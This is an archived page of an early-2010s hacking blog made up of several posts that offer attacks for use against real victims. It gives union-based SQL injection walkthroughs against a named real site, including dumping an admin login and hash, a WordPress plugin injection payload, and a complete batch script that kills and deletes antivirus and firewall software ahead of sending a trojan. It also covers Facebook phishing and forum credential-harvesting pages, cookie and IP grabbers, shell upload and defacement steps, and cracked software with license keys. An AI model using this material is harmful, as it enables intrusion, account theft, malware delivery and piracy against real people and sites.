ALL ItemZ

Monday, June 18, 2012

Automated Blind SQL Injection Attacking Tool

Though manual sql injection is best but we may need to use tool for sql injection. When sql injection url don't show error message and we find it as a blind sql injection vulnerability then we use it. There are many tools in internet.
One of the best tool for blind sql injection is BSQLBF expanded as Blind Sql Injection Brute Forcer.

Supported Database:

MS-SQL

MySQL

PostgreSQL

Oracle

It supports 8 kind of attacking:
back-end server to true & error (e.g syntax error) >>> Blind SQL Injection
Blind SQL Injection “order by” & “group by”
SYS privileges (ORACLE dbms_export_extension exploit ) >>> Find Data
O.S code execution (ORACLE dbms_export_extension exploit)
Read file (ORACLE dbms_export_extension exploit, java)
O.S code execution DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC exploit
O.S code execution SYS.KUPP $PROC.CREATE_MASTER_PROCESS(), DBA Privs
O.S code execution DBMS_JAVA_TEST.FUNCALL, java IO Permissions

Download BSQLBF

Download

Download IDM 6.08 Build 9 With Patch [Mediafire Link]

IDM is the fastest download accelerator software. Basically it is a premium software but in internet there are many free version. Maximum are fake or have some trouble in use. IDM 6.08 build 9 version have some extra features like speed limit and many more. So you can get a fresh mediafire link of IDM.

Download Link

Download Here

Saturday, June 9, 2012

PHP Script to Decrypt All Type of Hash

When to gain the admin information sometimes we get the password in hash. You should decrypt it into plain text. Now I share with you a php script to crack it. Open your notepad and paste the script. Then save it as php format like anything.php and save as type must be all files.

Script Link

Thursday, June 7, 2012

String Based SQL Injection Full Tutorial

Some days ago I posted a highly detailed tutorial about sql injection. You may face some problem like below:

www.site.com/index.php?id=1 order by 5-- >>> no error
www.site.com/index.php?id=1 order by 100-- >>>no error

If you face this kind of problem you should use string based sql injection. Follow me:

www.site.com/index.php?id=1' order by 100--+ >>>error

For string based sql injection give (+) at last. And add (') after value like id=1'

Example:
See the pic below.

I used order by 100-- but there are no error. Now I use string based sql injection. See another pic.

Yes. We got error. Now do other action as usual. Get mysql injection tutorial from here.

Monday, June 4, 2012

How to Get IP Address Of a Victim [Best Script]

Hello for hacking a pc or hack someone it is needed to know victim's ip address. We may face some problem about that. Ok today I give you the best script to find the victim's ip address.

What is needed?
- A free web hosting.
- IP caching script.

About the script
This script catches the IP addresses , active ports , Cookies , Web-Browser name , Date and time on the victims computer etc.
How to do?
1. Create an account on 000webhost.com and into its member area.
2. Now go to the cpanel of your domain.

3. Then scroll down and select file manager.
4. Now upload your ip caching script in public_html folder at .php format.
5. Now create a .txt file named logs.txt
6. Give the script link to the victim and when he click on the link you will get ip address, cookie, ports etc in your logs.txt folder.

See the demo pic of this script

Download the script
To get this script click here.

Sunday, June 3, 2012

2000+ SQL Injection Google Dorks:Web Hacking

Hello whats about your hacking? Today I provide you a huge collection of google dorks for sql injection. I gave you a tutorial of sql injection. You can get it here. So follow this tutorial and use google dork.

Google Dorks for SQL Injection

Happy Haciking.

Thursday, May 24, 2012

How to Hack an SMF Forum

Simple Machine Forum is a popular CMS for community forum. Today I share how to hack an SMF forum.

See following steps:
1. Go to the SMF forum which one you want to hack.
2. Click view>source. (or press ctrl+U)
3. Copy the source code and save it as index.php
4. Now go to the login page of the forum.
5. Again get the source.
6. Copy the source code and save it as login.php
7. Make a file named passwords.txt which is empty.
8. Upload all three files in a free web hosting site.
9. Make a moderator or owner of that forum login to your forum.
10. After he login or signup you got the password from passwords.txt file.
11. Now login that forum you want to hack with a mod or owner id.

Lolz. Enjoy.

Saturday, May 19, 2012

Hack Wordpress Blog:WordPress Calendar SQL Injection Vunerablity

WP Calender is vulnerable to sql injection in wordpress. So Follow my instruction.

1. Go to www.google.com
2. Dork:"powered by WordPress" inurl:"/?event_id="
Search it google and select anyone in a new tab which you comfortable.
3. Now after 'id=' use the code which is given below.
null+and+1=2+union+select 1,concat(user_login,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2
8+from+wp_users
4. You get the username and password. Password are in hash form. Decrypt the Hash.
5. You can login in www.site.com/wp-admin

I hope you enjoy the tutorial. :-)

Thursday, May 17, 2012

Havij 1.152 Pro Version Cracked Free Download

I always prefer manual sql injection. In a word it's best. My SQL Injection Tutorial is here. It is noob friendly and highly detailed.
Though there are many tools of SQL Injection but Havij is the best tool for SQL Injection. This tool is coded by ITSecTeam. The latest version of Havij is 1.152 and it is a pro tool. I bring its cracked version for you. Let's see the latest features of this tool.

What’s New in this version :-
-Webknight WAF bypass added.
-Bypassing mod_security made better
-Unicode support added
-A new method for tables/columns extraction in mssql
-Continuing previous tables/columns extraction made available
-Custom replacement added to the settings
-Default injection value added to the settings (when using %Inject_Here%)
-Table and column prefix added for blind injections
-Custom table and column list added.
-Custom time out added.
-A new md5 cracker site added
-bugfix: a bug releating to SELECT command
-bugfix: finding string column
-bugfix: getting multi column data in mssql
-bugfix: finding mysql column count
-bugfix: wrong syntax in injection string type in MsAccess
-bugfix: false positive results was removed
-bugfix: data extraction in url-encoded pages
-bugfix: loading saved projects
-bugfix: some errors in data extraction in mssql fixed.
-bugfix: a bug in MsAccess when guessing tables and columns
-bugfix: a bug when using proxy
-bugfix: enabling remote desktop bug in windows server 2008 (thanks to pegasus315)
-bugfix: false positive in finding columns count
-bugfix: when mssql error based method failed
-bugfix: a bug in saving data
-bugfix: Oracle and PostgreSQL detection

Download:

Download Link

How To Crack:

Open havij.

Now click on register. Write name: Cracked.By.Exidous_For_Opensc.ws
License file :- Contained in the folder name :- HavijKey.lic ( browse the location of the file ) then click on register.
It will be successfully cracked and I hope you will enjoy it.

Wednesday, May 16, 2012

SQL Injection Problems And Solutions

Some days ago I posted a highly detailed post in SQL Injection. Check the post from here.
When we Sqli in a website we find many problems which are not familiar to us. Today I show you some of this problems and its solutions.

ok so here are some simple solutions of some simple problems (sql injection)

first (if "order by" is not working" )

so you have a vulnerable site

Code: site.com/index.php?id=1

but the problem is that order by is not working

you entered this command:-

Code: site.com/index.php?id=1 order by 1--

<< no eror

Code: site.com/index.php?id=1 order by 5--

<<no eror

Code: site.com/index.php?id=1 order by 100--

<< no eror.. !!!

if you get this problem then use sqli string based and put this command:-

Code:

site.com/index.php?id=1' order by 1--+-

<<no eror

Code: site.com/index.php?id=1' order by 5--+-

<<no eror

Code: site.com/index.php?id=1' order by 100--+-

<<eror

(note): you can see i have also putted a single qoute (') at the place (id=1')<<so be carefull about this

* some times if you get problems by using order by e.g

Code: site.com/index.php?id=1 order by 100--

<<no eror

or

Code: site.com/index.php?id=1 order by 1--

<<eror

then try to change the query like this

Code: site.com/index.php?id=1 order by 1/*
site.com/index.php?id=1 order by 5/*

here are some more quries like:

Code:

-- - ,, --++- ,, -++--,,

* ok while injecting a site if you see that there are no usefull table

like (admin,auth,users,members,login) etc then remember every site have different number of schemas

and there are different tables in every schema and you will get schema names by this command:-

Code:
site.com/index.php?id=1 union select 1,2,group_concat(schema_name),4 from information_schema.schemata

and then tables from different schema using this:-

Code:
site.com/index.php?id=1 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=0x<hex value of schema name>

column names:-

Code:

site.com/index.php?id=1 union select 1,2,group_concat(column_name),4 from information_schema.tables where table_schema=0x<hex value of schema name> and table_name=0x<hex value of table name>

hope it will help you
Most sites has the problem when you try to get table names and it gives syntax eror

e.g you used this command:-

Code:

site.com/index.php?id=1 union select 1,2,group_concat(table_name),4 from information_schema.tables

and it give syntax error like you have error near at line..blah blah

on this condition you have to use different methods until your success

am writing down some of these commands:-

Code:

site.com/index.php?id=1 union select 1,2,group_concat(table_name),4 from information_schema.tables limit 0,1--

site.com/index.php?id=1 union select 1,2,concat(unhex(hex(table_name),4 from information_schema.tables limit 0,1

site.com/index.php?id=1 union select 1,2,table_name,4 from information_schema.tables limit 0,1--

hope it will help you

* sometimes while using "union select " you can get this error

Code:

illegal mix of collection

or something like this

then you should use this method:-

Code:

site.com/index.php?id=1 union select 1,2,convert(version() using latin1),4--

current user:-

Code:

site.com/index.php?id=1 union select 1,2,convert(user() using latin1),4--

or

Code:

site.com/index.php?id=1 union select 1,2,unhex(hex(@@version)),4--

Code:

site.com/index.php?id=1 union select 1,2,unhex(hex(user())),4--

mostly unhex(hex)) use to bypass illegal mix of collection error..

if still not working then you should use this:-

Code:

site.com/index.php?id=1 UnIoN SeLeCt 1,2,unhex(hex(@@version))),4--

hope it will help you..

Wednesday, May 9, 2012

SQL Injection Vulnerable Sites For Practice

Hello today I give you a fresh list of sql injection vulnerable sites. Some days ago I post 'Sql Injection Tutorial'. For practice sql injection I will give you this list. So try to do sqli and deface sites.

SQL Injection Vulnerable Sites

Happy Hacking !!

Tuesday, May 8, 2012

Restore Deleted or Missing Files From Computer

Hello many times we delete files and after sometime it can be important for us. Then when we get that deleted files?

Here is the solutions. I will provide you a software which can help you to restore/recover your deleted or missing files. I will give the download link below. After Download you will get a .rar files. After extract you find a file named 'Restoration'. Double click of that apps and you can see a window with many options. So happy restoring !

Download

Sunday, May 6, 2012

404 Not Found Private Shell Tutorial + Free Download

Hello when we got the admin access we need to upload shell. After uploading shell we can index deface of a website, server rooting, cpanel cracking etc. There are many php shell like C99, R57 etc. One of the best and secure shell is 404 not found private shell. Without password you can't open it. So if you upload shell in a server without you none can use it.
So what is it?
You can find this shell from here.
How To Use?
After uploading shell when you open the shell link you can find a page like this:

After move your mouse cursor and fix it when it get a box for giving a password.

After giving the password you will get the shell access.

You can change the password from shell. Find out a line like $auth_pass = "900150983cd24fb0d6963f7d28e17f72"; and from here you can change the password and it must be in hash form.
By default password: abc

Get 404 Not Found Private Shell

Friday, April 27, 2012

Admin Finder Tool Download

Hello readers, you may need admin panel of a website to deface this. There are many admin finder tools in online. But all are not good. Today I share with you an admin finder tool which is written by perl. I also give you the video tutorial of the tool. after extract the downloaded file you get the video tutorial with the admin finder tool.

If you like this post leave a comment.

Friday, April 20, 2012

SQL Injection Full Tutorial With Pic [Highly Detailed] [n00b friendly]

SQL Injection Tutorial:

Finding vulnerable sites
Finding amount of columns
Getting mysql version
Getting Databases
Getting Tables
Getting Columns
Getting Usernames and Passwords

1. Finding vulnerable sites

To find vulnerable sites we used google dork. Some of google dorks are:

inurl:index.php?id=
inurl:news.php?id=
inurl:gallery.php?id=
inurl:category.php?id=
inurl:games.php?id=
inurl:forum.php?tid=
inurl:newsletter.php?id=
inurl:content.php?id=

You can find the largest collection of google dorks from here.

So as an example I find vulnerable site that is
http://www.geotunis.org/index_en.php?id=7

I know about vulnerability by using string ('). At the last of url use ' and if you got a error then it is vulnerable. In many sites don't show error but some text or image are missing. This kind of sites are also vulnerable.

For sql injection we use a add-on which is very helpful to hacker.
Download it from https://addons.mozilla.org/en-US/firefox/addon/hackbar/

2. Finding Amount of Columns

To find the right number of column we are using "order by". After the url type 'order by 5' and see the page.

Here I do

www.geotunis.org/index_en.php?id=7 order by 5--

It seems that the page load normally and there are no error. That means columns are more than 5.

Again try

www.geotunis.org/index_en.php?id=7 order by 10--

It's showing error. That means columns number is less than 10.

By this try for finding columns number.

www.geotunis.org/index_en.php?id=7 order by 6-- [no error]

www.geotunis.org/index_en.php?id=7 order by 7-- [no error]

www.geotunis.org/index_en.php?id=7 order by 8-- [no error]

www.geotunis.org/index_en.php?id=7 order by 9-- [error]

So total column number is 8.

Now we find vulnerable column. To do this please folow me:

www.geotunis.org/index_en.php?id=-7 union all select 1,2,3,4,5,6,7,8--

After id= please insert [-] and it means null.

We got the vulnerable column is 4.

3. Getting Mysql Version

Now we wanna know the MySQL version. If its over 5 then its injectable by this Tut. (if its under 4 then you have to guess tables and columns).

www.geotunis.org/index_en.php?id=-7 union all select 1,2,3,@@version,5,6,7,8--

In the vulnerable column we use @@version instead of column number.

ok we find it.

4. Getting Databases

Now we wanna find the databases and the Current database.
Here the syntax for all databases:

www.geotunis.org/index_en.php?id=-7 union all select 1,2,3,group_concat(schema_name),5,6,7,8 from information_schema.schemata--

And it displays like this:

Now wel would like to now what is the current database, it's pretty obvious in this case but usefull sometimes.

Syntax for current database:

www.geotunis.org/index_en.php?id=-7 union all select 1,2,3,database(),5,6,7,8 from information_schema.schemata--

This should display something like this:

5. Getting Tables

Now we want to know the tables on in the database and for this we will conintue using "union select".

www.geotunis.org/index_en.php?id=-7 union all select 1,2,3,group_concat(table_name),5,6,7,8 from information_schema.tables where table_schema=database()--

It's output look like this:

Here admin table is 'utilisateurs'. In maximum sites tables are admin, users, administrator etc.

6. Getting Columns

Now we want to know the columns.
We will use following code:

www.geotunis.org/index_en.php?id=-7 union all select 1,2,3,group_concat(column_name),5,6,7,8 from information_schema.columns where table_schema=database()--

We got column and it looks like:

7. Dumping users/pass

Now you would like to dump logins and passwords.

www.geotunis.org/index_en.php?id=-7 union all select 1,2,3,group_concat(login,0x3a,pass,0x3a),5,6,7,8 from utilisateurs--

Now we got admin login and password.

Here login: atign and pass: 720a7e98c63c155ae17b0e7d3ce10a09

The pass is md5hash. You can decrypt this hash from www.md5hacker.com

Thanks. If you are helpful by this tutorial please leave a comment and give us review in alexa.

Friday, April 13, 2012

Sqli Google Dork Scanner Tool SQL Poizon Download

Sql poizon tool includes php, asp, rfi, lfi dorks. You can scan site by google dorks. And fix vulnerable sites. This software allows you to scan site based on country. After scan site you can crawl sites for checking vulnerability. You also can inject by this tools. Lets see screenshot of this tool:

Download Link:

Friday, April 6, 2012

IIS Full Hacking Tutorial + 15000+ Vulnerable Sites List

IIS is one of the easiest hacking tutorial. Basically it is for n00b hackers. Today I will give you the full tutorial of IIS exploits. I will show you how to hack by IIS in windows 7. Not for windows xp. So let's start.

First of all go to my computer and then click on 'Add a network location' from right button of mouse.

You will see a pic like below:

Then click next. And select 'Choose a custom network location'.

Now click next. Select a site from the vulnerable sites list. I select http://www.lsqqby.cn/

Click on next. If the site vulnerable then show you like below.

Simply click next.

Now click on finish. A new window will be shown.

Now copy and paste your deface page in this folder.

See your hacking page from www.examplesite.com/deface.html
in the name of deface.html write your deface page name and extension. If your deface page name is 'hacked' then write 'hacked.html'

Demo: http://www.lsqqby.cn/dr.10c41h05t.html

Download 15000+ IIS vulnerable websites.

***All websites may not be vulnerable. If you show error or can't paste your deface page then try in another site***

Wednesday, April 4, 2012

Hack Pc: Hack All Passwords Of a computer with Pen drive/Memory card

You can steal all saved passwords from a pc with pen drive/memory card. It's quiet easy process. But don't try it for harm.

Download the file and unzip. You have got 6 files. Paste this 6 files in your pen drive/memory card. Then input the pen drive in the computer and if the computer have auto run then you need nothing to do. But if auto run is off in that computer just open your pen drive secretly. Click on Launch file. Your work have done. Now insert the pen drive in your pc and open it. You find their 4 text file which is WebBrowserPassView, pspv, mspass and mailpv. Now open it with notepad. You find the passwords of that pc.

Password: allitemz.blogspot.com

Tuesday, April 3, 2012

Hack Antivirus: Disable Victim's Antivirus Using Batch File

You can disable victim's antivirus using batch file. This is quiet easy. It is necessary if you send someone trojan. Because anti virus can't run trojan. So before send trojan, send this batch file for disable anti virus.

Open the Notepad and paste the code below:

@ echo off
rem –
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem –

Now save this file as allitemz.bat
Select save type as all files.

Now send it to the victim.. Happy Hacking..

Friday, March 30, 2012

ESET nod32 Smart Security 5.0.93.0 Download With Username And Password

Eset nod32 smart security is a powerfull antivirus that can keep your pc, browser and email safe. In Eset free version you can not get the full features. For get the full features you have to have an username and password. It is provided for payable user. Today I will give you the download link with an username and password.

Download Link:

Sunday, March 25, 2012

Learn To Hack Facebook Account With Phishing

Many people want to hack facebook account but they don't know the proper way. Today I will give a tutorial about facebook hacking with phishing. This is the simple tutorial by which you can hack your friend's facebook account. If you want to learn more about phishing click here.

Facebook Hacking Tutorial:
This is the most common way of hacking. By this you can send a fake login page to your fool friend and when your friend/victim want to sign in then his login details come to you.

1. For start hacking first of all Download Facebook Phisher.
2. The downloaded file contains below:
   a. index.html
   b. write.php
3. Upload both file in a free web hosting sites.
4. Some best free hosting sites are:
www.000webhost.com
www.x10hosting.com
www.viralhosts.com
www.my3gb.com
www.heliohost.org
5. Your work almost over. Now send the phisher link (index.html link) to your victim and    make him login with his email and password.
6. If he login with his email and password then his typed id and password is in passes.txt

If you dont get passes.txt, try refreshing your page.Once you get passes.txt, you get Facebook password and can easily use it for hacking Facebook account.
7. Now, open passes.txt to get hacked Facebook id and password as shown.

Hope you can learn well. So you have problem to understand this tutorial then comment in this post. I will try my best to give you proper satisfaction.

Friday, March 23, 2012

Acunetix Web Vulnerability Scanner V8 With Patch

Acunetix is the most popular web vulnerability scanner. With this you can scan a website and know the vulnerability of any website. Its free version only give you the xss vulnerability information. But if you have the enterprise edition you can get all information of an website. The latest version of acunetix is version 8. Today I give you the the full version of acunetix v8 with patch. So folow me:

First got to this link and download acunetix scanner

http://www.acunetix.com/download/fullver8

ID: acunetixwvsfullv8
Password: nFu834!29bg_S2q

Then install it do not open it. If it is open then close it.

Open patch and click on patch file.

Now open Acunetix you will be asked for some details

Enter below details

License Key: 2e3b81463d2s56ae60dwe77fd54f7d60
Name:         Hmily/[LCG]
ComPany:      Www.52PoJie.Cn
Email:        Hmily@Acunetix.com
Telephone:    110

Patch Link:

http://adf.ly/8I8ro

Thursday, March 22, 2012

All in One SEO Pack - WordPress Plugin (Video Tutorial)

WordPress SEO plugin to automatically optimize your WordPress blog for Search Engines.

Some features:

Google Analytics support
Support for Custom Post Types
Advanced Canonical URLs
Fine tune Page Navigational Links
Built-in API so other plugins/themes can access and extend functionality
ONLY plugin to provide SEO Integration for WP e-Commerce sites
Nonce Security
Support for CMS-style WordPress installations
Automatically optimizes your titles for search engines
Generates META tags automatically
Avoids the typical duplicate content found on WordPress blogs
For beginners, you don't even have to look at the options, it works out-of-the-box. Just install.
For advanced users, you can fine-tune everything
You can override any title and set any META description and any META keywords you want.
Backward-Compatibility with many other plugins, like Auto Meta, Ultimate Tag Warrior and others.

Download: All In One SEO Pack

Video Tutorial: http://www.youtube.com/watch?v=uMhrb3bZC7w

Timthumb Vulnerability Scanner - Wordpress Plugin

Scans your wp-content directory for vulnerable instances of timthumb.php, and optionally upgrades them to a safe version.

The Timthumb Vulnerability Scanner plugin will scan your entire wp-content directory for instances of any outdated and insecure version of the timthumb script, and give you the option to automatically upgrade them with a single click. Doing so will protect you from hackers looking to exploit this particular vulnerability.

Download: Timthumb Vulnerability Scanner

Wednesday, March 21, 2012

Tmedit Popup Deface and Shell Upload Vulnerability

Hello today I will give you an idea of new exploits.

Google dork: inurl:/editor/tmedit/popups
Exploits: /editor/tmedit/popups/InsertFile/insert_file.php

Lets start.

1st go to google.com and search the dork inurl:/editor/tmedit/popups . You can get some results.

Pick anyone of this. Now select your deface page and upload. After uploading click on uploaded file and you get the link.
By this way you can also upload shell.

Demo: http://www.bihap.org/uploadfiles/xd.html
http://www.masjidklangchachengsao.com/uploadfiles/xd.html

Monday, March 19, 2012

Wordpress Plugin : Facebook Like - Content Locker

With this powerful Content Locker you can lock your entire blog for a user, until he hits the Facebook Like Button.
You have various settings that you can edit in this powerful plugin: -Set custom background color for widget -Set custom color for transparent "blog" cover -Set transparency for the widget -Enter Facebook Admins for the page -Set Facebook meta data (title, image, description etc...)

Download Link

Sunday, March 18, 2012

30 Powerful Wordpress Plugin For Admin

We can make a blog by wordpress. But for the change of interface and security we need to use plugin. After creating a blog by wordpress we face some problem about plugin. Today I will give you 30 powerful Wordpress plugin. Let's introduce with this plugin: